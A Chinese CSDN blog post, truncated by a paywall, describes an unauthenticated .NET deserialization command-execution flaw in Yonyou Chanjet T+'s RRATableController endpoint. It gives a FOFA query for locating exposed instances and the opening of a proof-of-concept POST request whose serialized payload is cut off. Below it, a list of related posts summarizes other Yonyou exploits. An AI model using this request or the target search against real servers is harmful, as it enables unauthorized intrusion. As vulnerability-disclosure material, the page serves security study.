用友畅捷通RRATableController存在反序列化漏洞

最新推荐文章于 2024-06-18 02:29:00 发布
最新推荐文章于 2024-06-18 02:29:00 发布
阅读量285 收藏
点赞数 1
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/137110845
版权
用友畅捷通 T+ /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx接口存在.net反序列化漏洞,未经过身份认证的攻击者可以通过构造恶意的序列化请求在目标服务器上执行任意命令。
摘要由CSDN通过智能技术生成

1.漏洞介绍

用友畅捷通 T+ /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx接口存在.net反序列化漏洞,未经过身份认证的攻击者可以通过构造恶意的序列化请求在目标服务器上执行任意命令

2.漏洞编号
CVE CNVD CNNVD
- - -

3.影响范围
名称 版本号
-

4.检索特征

FOFA:app=“畅捷通-TPlus”

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

5.POC
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json
{
  "storeID":{
    "__type"
最低0.47元/天 解锁文章
qq_36334672
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
T+ 序列漏洞复现(QVD-2023-13615)
0xSec
06-23 4384
T+ 在.net序列漏洞,未经过身份认证的攻击者可以过构造恶意的序列请求在目标服务器上执行任意命令。
EtMi832#PeiQi-WIKI-POC#用友 NC XbrlPersistenceServlet序列2
07-25
用友 NC XbrlPersistenceServlet序列漏洞描述用友 NC XbrlPersistenceServlet序列漏洞漏洞影响用友NC漏洞
漏洞复现】用友CRM get_usedspace在SQL注入漏洞
qq_34780861的博客
04-11 270
CRM系统get_usedspace在SQL注入漏洞 ,攻击者可以利用该漏洞获取网站后台数据库敏感信息,甚至接管服务器权限,构成严重风险。
漏洞复现】T+ RRATableController 远程命令执行漏洞
最新发布
凝聚力安全团队
06-18 310
T+ Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore 接口序列漏洞,可导致命令执行。被攻击者利用此漏洞可直接接管服务器。
漏洞复现】用友CRM create_site.php SQL 注入漏洞
qq_34780861的博客
04-11 211
CRM系统create_site.php在SQL注入漏洞 ,攻击者可以利用该漏洞获取网站后台数据库敏感信息,甚至接管服务器权限,构成严重风险。
【1day】复现用友CRM create_site.phpSQL注入漏洞
记录并分享学习安全的知识点..
08-08 328
用友CRM是专为小企业量身打造的智慧型客户关系管理应用,它包括客户、商机、报价、团队管理、客户营销、客户服务、主题查询及统计分析,帮助企业管好客户、管好业务员、做好销售业务;系统还提供知、审批、短信、文档、任务等协作功能,提高销售团队的协作效率,其中 create_site.php接口在时间盲注漏洞
漏洞复现】用友TPlus InitServerInfo.aspx SQL注入漏洞
https://blog.echo234.cn/
03-25 515
T+专属云适用于需要一体管理的企业,财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体管理。该系统在InitServerInfo.aspx接口处未对用户的输入进行过滤和校验在SQL注入漏洞
漏洞复现--用友 T+ .net序列RCE
qq_53003652的博客
10-25 1300
T+是一款新型互联网企业管理软件。全面满足成长型小微企业对其灵活业务流程的管控需求,重点解决往来业务管理、订单跟踪、资金、库等管理难题。该产品在.net序列可导致RCE。访问执行命令的日志文件即test.txt。执行ipconfig /all。此脚本来自揽月安全团队。
漏洞复现1day】T+ RRATableController,Ufida.T.DI.UIP.ashx 序列RCE漏洞
qq_34780861的博客
03-21 729
T+ RRATableController,Ufida.T.DI.UIP.ashx 序列RCE漏洞
用友T6数据字典
02-12
用友T6数据字典详解》 用友T6是一款针对中小型企业设计的全面企业管理软件,涵盖了财务、采购、销售、库、生产等多个业务领域。在这款软件中,数据字典扮演着至关重要的角色,它是理解和操作T6系统...
用友T+数据库字典17.0
11-09
用友T+数据库字典17.0
用友 t3 t6 u8固定资产模块修复工具
08-25
用友 t3 t6 u8固定资产模块修复工具
用友CRM在默认空口令漏洞
nnn2188185的博客
04-23 459
用友CRM在默认空口令漏洞,攻击者可以利用默认口令登录网站后台,以后台权限进行敏感操作,构成信息泄露风险。
漏洞复现 用友T+任意文件上传漏洞(CNVD-2022-60632)
nnn2188185的博客
04-15 667
2022年8月29日和8月30日,公司紧急发布安全补丁修复了T+软件任意文件上传漏洞。未经身份认证的攻击者利用该漏洞过绕过系统鉴权,在特定配置环境下实现任意文件的上传,从而执行任意代码,获得服务器控制权限。目前,已有用户被不法分子利用该漏洞进行勒索病毒攻击的情况出现。
T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞
selecthch的博客
03-26 449
TPlus适用于异地多组织、多机构对企业财务汇总的管理需求;全面支持企业对远程仓库、异地办事处的管理需求;全面满足企业财务业务一体管理需求。其Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore接口序列漏洞,可导致命令执行。漏洞名称:T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞漏洞类别:远程命令执行漏洞
用友T+ keyEdit sql注入漏洞
Keepb1ue的博客
05-11 467
T+ 是一款灵动,智慧,时尚的基于互联网时代开发的管理软件,主要针对中小型工贸与商贸企业,尤其适合有异地多组织机构(多工厂,多仓库,多办事处,多经销商)的企业,涵盖了财务,业务,生产等领域的应用,产品应用功能包括:采购管理、库管理、销售管理、生产管理、分销管理、零售管理、往来管理、现金银行管理、总账、移动应用等,融入了社交、移动、电子商务、互联网信息订阅等元素,为企业打造全新的生意模式、管理模式、工作模式。
漏洞复现】T+ App_Code.ashx 远程命令执行漏洞
凝聚力安全团队
06-17 617
T+ Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore 接口序列漏洞,可导致命令执行。被攻击者利用此漏洞可直接接管服务器。
漏洞复现】用友-T+-App_Code-远程命令执行
知黑而守白
01-22 206
用友 T+是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库管理等。主要针对中小型工贸和商贸企业的财务业务一体应用,融入了社交、移动、物联网、电子商务、互联网信息订阅等元素。用友 T+某模块在远程命令执行漏洞。攻击者可以过构造恶意的数据包,成功注入并执行恶意命令,可能导致系统敏感信息泄露、篡改、服务器接管或其他严重后果。
用友u8 cloud 序列rce漏洞复现
12-05
用友U8 Cloud是一款企业级管理软件,但是近期被发现序列远程命令执行(RCE)漏洞。要复现这个漏洞,首先需要一个能够触发序列的点,比如一个可控制的对象。接下来,我们可以构造一个恶意的序列数据,然后将这个数据传递给U8 Cloud系统,让系统进行序列操作。当系统对这个数据进行序列时,就会触发我们植入的恶意代码,从而实现远程命令执行。 为了更具体地说明这个过程,我们可以借助一个简单的例子来解释。假设我们构造了一个包含恶意命令的序列数据,并将其发给U8 Cloud系统。系统在接收到这个数据后,会将其解析,然后执行其中的命令。这样一来,我们就成功地利用了序列漏洞来实现远程命令执行。 当然,为了成功复现这个漏洞,还需要一些具体的技术细节和环境配置。需要了解U8 Cloud系统的结构和漏洞的具体利用方式,还可能需要使用特定的工具来构造恶意的序列数据。在复现过程中,一定要格外小心,确保不会对受影响的系统造成损害。同时,及时向厂商馈该漏洞,以便及时修复和加强系统安全防护。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值